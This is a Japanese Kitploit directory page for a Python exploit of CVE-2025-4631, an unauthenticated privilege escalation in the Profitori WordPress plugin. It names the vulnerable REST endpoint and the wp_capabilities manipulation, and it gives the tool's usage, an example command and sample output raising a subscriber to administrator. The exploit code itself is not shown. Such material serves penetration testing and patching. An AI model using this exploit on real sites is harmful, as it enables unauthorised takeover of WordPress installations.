Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-4631 — Profitori 2.0.6.0 - 2.1.1.3 - 認可の欠如による未認証の権限昇格 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-4631
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-4631

CVE-2025-4631

Profitori 2.0.6.0 - 2.1.1.3 - 認可の欠如による未認証の権限昇格

リポジトリを見る
1111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2025-4631 - Profitori WordPress プラグイン権限昇格エクスプロイト

📌 脆弱性概要

Profitori プラグイン(バージョン 2.0.6.0 から 2.1.1.3) は、/wp-json/stocktend/v1/stocktend_object エンドポイントの権限チェック欠如により、認証されていない権限昇格に対して脆弱です。これにより、リモート攻撃者は wp_capabilities メタフィールドを直接操作して、既存ユーザーの権限を昇格(または新規ユーザーを作成)することができます。

  • CVE: CVE-2025-4631
  • CVSS スコア: 9.8(緊急)
  • 公開日: 2025年5月30日
  • 最終更新日: 2025年5月31日

🛠️ このスクリプトの機能

この Python エクスプロイトは、以下の手順で権限昇格プロセスを自動化します:

  1. ✅ readme.txt ファイルを介してプラグインのバージョンを確認します。
  2. 🚀 脆弱性のあるバージョンが検出された場合、脆弱な REST API エンドポイントを悪用します。
  3. 📡 ペイロードを送信して、ユーザーの権限を管理者(Administrator)に昇格させます。
  4. 🧾 変更されたユーザーの認証情報を含む、フォーマットされた詳細な結果を出力します。

バージョンチェックが失敗した場合、エクスプロイトは警告とともに慎重に続行されます。


📸 エクスプロイトの証明

概念実証


💻 使用方法

root@kitploit:~
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]

例:

root@kitploit:~
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3

出力例:

root@kitploit:~
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!

[🧾] Updated User Information:
--------------------------------------
🆔 User ID         : 3
👤 Username        : subscriber
📧 Email           : [email protected]
🪪 Display Name    : Subscriber User
🔗 User URL        : 
🛡 Role Raw        : a:1:{s:13:"administrator";b:1;}

[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub       : https://github.com/Nxploited
📧 Email        : [email protected]

⚙️ スクリプト引数


📂 必要条件

  • Python 3.x
  • requests ライブラリ

以下のコマンドでインストール:

root@kitploit:~
pip install requests

⚠️ 免責事項

このツールは、教育および許可されたテスト目的のみで提供されています。所有していない、または明示的なテスト許可を得ていないシステムに対する本エクスプロイトの不正使用は、固く禁止されています。作成者は、不適切な使用によって生じたいかなる損害や法的結果についても責任を負いません。


作者: Nxploited ( Khaled_Alenazi )

ツールをダウンロード
フラグ説明必須
-u, --url🌐 WordPress サイトのベース URL✅ 必須
-id🆔 権限を昇格するユーザーの ID✅ 必須
--email📧 表示用のダミーメールアドレス❌ 任意
--name👤 表示名❌ 任意
--url_field🔗 ユーザー URL フィールド❌ 任意
--verbose🔍 完全な JSON レスポンスを出力❌ 任意